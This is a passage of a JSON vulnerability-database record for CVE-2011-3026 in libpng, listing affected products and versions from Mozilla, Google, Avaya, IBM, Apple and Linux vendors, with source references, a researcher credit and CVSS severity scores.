"vendor": "ubuntu",
"version": "10.10"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0.1"
},
{
"model": "productions pale moon",
"scope": "eq",
"trust": 0.3,
"vendor": "moonchild",
"version": "3.6.26"
},
{
"model": "firefox beta11",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.10"
},
{
"model": "productions pale moon",
"scope": "eq",
"trust": 0.3,
"vendor": "moonchild",
"version": "3.6.27"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5"
},
{
"model": "firefox esr",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.2"
},
{
"model": "storwize unified",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.40"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.3"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.62"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.10"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "9.0"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.6"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2011"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16"
},
{
"model": "linux lts lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.1"
},
{
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.12"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.34"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.16"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.551.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.10"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.8"
},
{
"model": "enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.23"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.13"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.3"
},
{
"model": "aura system manager",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3.2"
},
{
"model": "aura system manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "seamonkey alpha1",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.2"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12"
},
{
"model": "beta",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.101"
},
{
"model": "aura system manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "seamonkey alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.03"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.17"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.15"
},
{
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "communication server 1000m signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"model": "aura experience portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.212"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.1"
},
{
"model": "messaging storage server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.12"
},
{
"model": "communication server 1000e",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874102"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.14"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.206"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.8"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.37"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.133"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2.2"
},
{
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "15.0.900.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.22"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "5.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.46"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.10"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.3"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.12"
},
{
"model": "seamonkey alpha3",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "aura session manager",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3"
},
{
"model": "conferencing standard edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.220"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.101"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.10"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.2"
},
{
"model": "aura session manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.14"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.12"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.18"
},
{
"model": "firefox beta9",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.13"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "9.0"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "5.0.1"
},
{
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "ip office application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "8.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.19"
},
{
"model": "linux enterprise server sp1 for sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.20"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.43"
},
{
"model": "firefox beta5",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.16"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.6"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.300"
},
{
"model": "enterprise linux server optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.2"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1.2"
},
{
"model": "aura application server sip core pb26",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.10"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.221"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.102"
},
{
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.307"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.8"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.12"
},
{
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.5"
},
{
"model": "seamonkey rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "linux enterprise sdk sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.205"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.16"
},
{
"model": "aura application server sip core pb25",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "5"
},
{
"model": "seamonkey",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.7.2"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.43"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.204"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.1"
},
{
"model": "aura experience portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "5.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3"
},
{
"model": "informix genero",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.40"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.21"
},
{
"model": "communication server 1000e signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "firefox beta3",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "aura system manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.21"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "aura system platform sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "linux enterprise desktop sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.103"
},
{
"model": "firefox beta7",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.224"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.18"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.71"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.8"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.0.5"
},
{
"model": "seamonkey alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.02"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.8"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.01"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.020"
},
{
"model": "enterprise linux desktop optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.91"
},
{
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.308"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.84"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.210"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.550.0"
},
{
"model": "rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.22"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "enterprise linux hpc node",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.14"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.6"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.4"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.309"
},
{
"model": "firefox beta12",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.214"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.4"
},
{
"model": "communication server 1000e signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.5"
},
{
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.0.9.8"
},
{
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.7"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.1"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "10"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7"
},
{
"model": "aura application server sip core pb16",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.8"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "11"
},
{
"model": "seamonkey alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.01"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.201"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.11"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.13"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.672.2"
},
{
"model": "ios",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "6"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.163"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.8.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10"
},
{
"model": "communication server 1000m",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.304"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11"
},
{
"model": "communication server 1000e signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.11"
},
{
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.305"
},
{
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.20"
},
{
"model": "linux enterprise desktop sp1 for sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.237"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.21"
},
{
"model": "linux enterprise desktop sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "15"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "aura conferencing standard",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "lotus notes fp2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.2"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.35"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.16"
},
{
"model": "communication server 1000m signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.205"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "11.0.700.3"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.2"
},
{
"model": "message networking",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.5"
},
{
"model": "aura application server sip core",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.4"
},
{
"model": "communication server 1000e",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.19"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.7"
},
{
"model": "productions pale moon",
"scope": "eq",
"trust": 0.3,
"vendor": "moonchild",
"version": "9.1"
},
{
"model": "messaging storage server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.2"
},
{
"model": "communication server 1000m",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.19"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jueri Aedla",
"sources": [
{
"db": "BID",
"id": "52049"
}
],
"trust": 0.3
},
"cve": "CVE-2011-3026",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2011-3026",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 10.0,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.7,
"exploitability": "NOT DEFINED",
"exploitabilityScore": 10.0,
"id": "CVE-2012-6277",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-59558",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-50971",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
